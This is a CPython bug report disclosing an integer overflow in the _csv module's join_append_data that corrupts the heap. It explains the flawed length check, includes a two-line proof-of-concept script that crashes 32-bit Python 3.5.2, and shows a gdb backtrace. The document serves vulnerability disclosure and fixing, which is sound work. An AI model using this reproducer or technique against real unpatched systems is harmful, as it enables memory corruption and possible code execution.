Issue 27758: integer overflow in the _csv module's join_append_data function (original) (raw)
Thomas E Hybel on PSRT reports:
This vulnerability is an integer overflow leading to a heap buffer overflow. I have attached a proof-of-concept script below.
The vulnerability resides in the Modules/_csv.c file, in the join_append and join_append_data functions.
join_append initially calls join_append_data with copy_phase=0 to compute the new length of its internal "rec" buffer. Then it grows the buffer. Finally it calls join_append_data with copy_phase=1 to perform the actual writing.
The root issue is that join_append_data does not check for overflow when computing the field rec_len which it returns. By having join_append_data called on a few fields of appropriate length, we can make rec_len roll around and become a small integer.
Note that there is already a check in join_append for whether (rec_len < 0). But this check is insufficient as we can cause rec_len to grow sufficiently in a single call to never let join_append see a negative size.
After the overflow happens, rec_len is a small integer, and thus when join_append calls join_check_rec_size to potentially grow the rec buffer, no enlargement happens. After this, join_append_data is called again, now with copy_phase=1, and with a giant field_len.
Thus join_append_data writes the remaining data out-of-bounds of the self->rec buffer which is located on the heap. Such a complete heap corruption should definitely be exploitable to gain remote code execution.
Further details:
Tested version: Python-3.5.2, 32 bits
Proof-of-concept reproducer script (32-bits only):
--- begin script ---
import _csv
class MockFile: def write(self, _): pass
writer = _csv.writer(MockFile()) writer.writerow(["A"*0x10000, '"'*0x7fffff00])
--- end script ---
Python (configured with --with-pydebug) segfaults when the script is run. A backtrace can be seen below. Note that the script only crashes on 32-bit versions of Python. That's because the rec_len variable is an ssize_t, which is 4 bytes wide on 32-bit architectures, but 8 bytes wide on 64-bit arches.
(gdb) r Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc1.py ... Program received signal SIGSEGV, Segmentation fault. PyType_IsSubtype (a=0x0, b=b@entry=0x82d9aa0 ) at Objects/typeobject.c:1343 1343 mro = a->tp_mro; (gdb) bt #0 PyType_IsSubtype (a=0x0, b=b@entry=0x82d9aa0 ) at Objects/typeobject.c:1343 #1 0x080e29d9 in PyModule_GetState (m=0xb7c377f4) at Objects/moduleobject.c:532 #2 0xb7fd1a33 in join_append_data (self=self@entry=0xb7c2ffac, field_kind=field_kind@entry=0x1, field_data=field_data@entry=0x37c2f038, field_len=field_len@entry=0x7fffff00, quoted=quoted@entry=0xbffff710, copy_phase=copy_phase@entry=0x1) at /home/ubuntu32/python3/Python-3.5.2/Modules/_csv.c:1060 #3 0xb7fd1d6e in join_append (self=self@entry=0xb7c2ffac, field=field@entry=0x37c2f018, quoted=0x1, quoted@entry=0x0) at /home/ubuntu32/python3/Python-3.5.2/Modules/_csv.c:1138 ...